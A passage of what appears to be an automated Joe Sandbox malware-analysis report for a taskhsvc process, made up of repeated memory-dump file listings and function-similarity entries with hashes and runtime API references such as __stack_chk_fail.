Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: 7cb06ade6c09a1f9779948c2a3640694967774a2bc79c9bcdbb7731b034aad01
Instruction ID: 37ce2f9f4f04715123c4fa51c5c902c9d7b28ef6c3554ae6ceadccbc08ab6b4b
Opcode Fuzzy Hash: 7cb06ade6c09a1f9779948c2a3640694967774a2bc79c9bcdbb7731b034aad01
Instruction Fuzzy Hash: CE3131B4E0470A9FCB40EFB9C5856AEBBF0AF48744F049829E998E7301E734D9419F52

Uniqueness

Uniqueness Score: -1.00%

Function 00D976BD Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D977A4

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 7b081a7179809a8361559c4aad4e7d726c3c93d68ea04d13865daca41a1d3450
Instruction ID: 1a9b9946ff7c74ce952caa554eff19b2a0b5668f5236b3d7c37e58d969ca1602
Opcode Fuzzy Hash: 7b081a7179809a8361559c4aad4e7d726c3c93d68ea04d13865daca41a1d3450
Instruction Fuzzy Hash: F2214AB45083029BDB00AF69C4457AEBBE0BF84314F15D95DF0989B382C7789544DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00E31FCB Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00E31DC5: abort.MSVCRT ref: 00E31E5F
Part of subcall function 00E31DC5: __stack_chk_fail.LIBSSP-0 ref: 00E31FBD

__stack_chk_fail.LIBSSP-0 ref: 00E3205D

Memory Dump Source

Source File: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: 6b860a9282633dc3ab9ae90705b8b8c1aa2eaa6e6e93bea32cccf59b2872efb4
Instruction ID: ede0f7ea904777fd5d43e257544885086f12861b5f9ae8396ff9bc764d51d162
Opcode Fuzzy Hash: 6b860a9282633dc3ab9ae90705b8b8c1aa2eaa6e6e93bea32cccf59b2872efb4
Instruction Fuzzy Hash: F12159B8E092499FCB04CFA8D58099EBBF1BB8D310F14845EE898A3341D334A905CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00EF67DB Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00EE9B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE45AC), ref: 00EE9B69

Part of subcall function 00EE9D53: __stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

Part of subcall function 00EF65E9: __stack_chk_fail.LIBSSP-0 ref: 00EF6762

Part of subcall function 00EE9B70: free.MSVCRT ref: 00EE9BA5
Part of subcall function 00EE9B70: free.MSVCRT ref: 00EE9BC7
Part of subcall function 00EE9B70: __stack_chk_fail.LIBSSP-0 ref: 00EE9BE1

__stack_chk_fail.LIBSSP-0 ref: 00EF685E

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: 5e2ebfc6d53b4c86c79efae9c1002d8a908abd4a3dc005b0f00619c9efd3d818
Instruction ID: c9aa88bbd81a0174ac5ada8b288ee4bb28339e20e7db276c87d0b66c0d93ef2a
Opcode Fuzzy Hash: 5e2ebfc6d53b4c86c79efae9c1002d8a908abd4a3dc005b0f00619c9efd3d818
Instruction Fuzzy Hash: 13111FB4E0560ADFCB40DFA9D58599EBBF0FF08310F10952AE958E7305E734A9418F91

Uniqueness

Uniqueness Score: -1.00%

Function 00D92D88 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D92DFB

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
